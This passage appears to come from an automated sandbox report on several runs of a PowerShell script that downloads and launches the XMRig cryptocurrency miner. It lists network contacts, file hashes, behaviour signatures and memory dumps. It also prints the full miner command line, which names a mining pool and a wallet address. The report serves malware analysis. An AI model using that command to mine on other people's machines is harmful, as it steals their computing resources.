| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/2812-0-0x00007FFCBB3D3000-0x00007FFCBB3D4000-memory.dmp
memory/2812-5-0x0000019F545D0000-0x0000019F545F2000-memory.dmp
memory/2812-8-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
memory/2812-9-0x0000019F54780000-0x0000019F547F6000-memory.dmp
memory/2812-10-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g4vlchze.fkx.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2812-25-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
memory/2812-48-0x0000019F54920000-0x0000019F54932000-memory.dmp
memory/2812-61-0x0000019F54760000-0x0000019F5476A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5072-90-0x000001EABAE80000-0x000001EABAEA0000-memory.dmp
memory/2812-91-0x00007FFCBB3D3000-0x00007FFCBB3D4000-memory.dmp
memory/2812-92-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
memory/5072-93-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/2812-94-0x00007FFCBB3D0000-0x00007FFCBBDBC000-memory.dmp
memory/5072-95-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-96-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-97-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-98-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-99-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-100-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-101-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-102-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-103-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-104-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-105-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-106-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-107-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-108-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-109-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-110-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-111-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-112-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-113-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-114-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-115-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-116-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-117-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-118-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-119-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-120-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-121-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-122-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-123-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-124-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-125-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-126-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-127-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-128-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-129-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-130-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-131-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-132-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-133-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-134-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-135-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-136-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-137-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-138-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-139-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-140-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-141-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-142-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-143-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-144-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-145-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-146-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-147-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-148-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-149-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-150-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-151-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-152-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-153-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-154-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-155-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-156-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:56
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1781s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1716 wrote to memory of 1328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1716 wrote to memory of 1328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/1716-4-0x00007FFE1D623000-0x00007FFE1D624000-memory.dmp
memory/1716-5-0x0000021EC42A0000-0x0000021EC42C2000-memory.dmp
memory/1716-9-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1716-8-0x0000021EC4560000-0x0000021EC45D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcdngcvi.y2p.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1716-18-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1716-25-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1716-48-0x0000021EC46E0000-0x0000021EC46F2000-memory.dmp
memory/1716-61-0x0000021EC4540000-0x0000021EC454A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1328-90-0x0000027F7FE10000-0x0000027F7FE30000-memory.dmp
memory/1328-91-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-92-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1716-93-0x00007FFE1D623000-0x00007FFE1D624000-memory.dmp
memory/1716-94-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1716-95-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1328-96-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-97-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-98-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-99-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-100-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-101-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-102-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-103-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-104-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-105-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-106-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-107-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-108-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-109-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-110-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-111-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-112-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-113-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-114-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-115-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-116-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-117-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-118-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-119-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-120-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-121-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-122-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-123-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-124-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-125-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-126-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-127-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-128-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-129-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-130-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-131-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-132-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-133-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-134-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-135-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-136-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-137-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-138-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-139-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-140-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-141-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-142-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-143-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-144-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-145-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-146-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-147-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-148-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-149-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-150-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-151-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-152-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-153-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-154-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-155-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-156-0x00007FF771800000-0x00007FF772433000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:27
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1768s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 860 wrote to memory of 4196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 860 wrote to memory of 4196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/860-2-0x00007FF8C3953000-0x00007FF8C3954000-memory.dmp
memory/860-5-0x00000267A2360000-0x00000267A2382000-memory.dmp
memory/860-6-0x00007FF8C3950000-0x00007FF8C433C000-memory.dmp
memory/860-9-0x00007FF8C3950000-0x00007FF8C433C000-memory.dmp
memory/860-10-0x00000267A2510000-0x00000267A2586000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ueq0whlr.ebd.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/860-25-0x00007FF8C3950000-0x00007FF8C433C000-memory.dmp
memory/860-48-0x00000267A2590000-0x00000267A25A2000-memory.dmp
memory/860-61-0x00000267A24F0000-0x00000267A24FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4196-90-0x0000017665700000-0x0000017665720000-memory.dmp
memory/4196-91-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/860-92-0x00007FF8C3953000-0x00007FF8C3954000-memory.dmp
memory/4196-93-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/860-94-0x00007FF8C3950000-0x00007FF8C433C000-memory.dmp
memory/4196-95-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-96-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-97-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-98-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-99-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-100-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-101-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-102-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-103-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-104-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-105-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-106-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-107-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-108-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-109-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-110-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-111-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
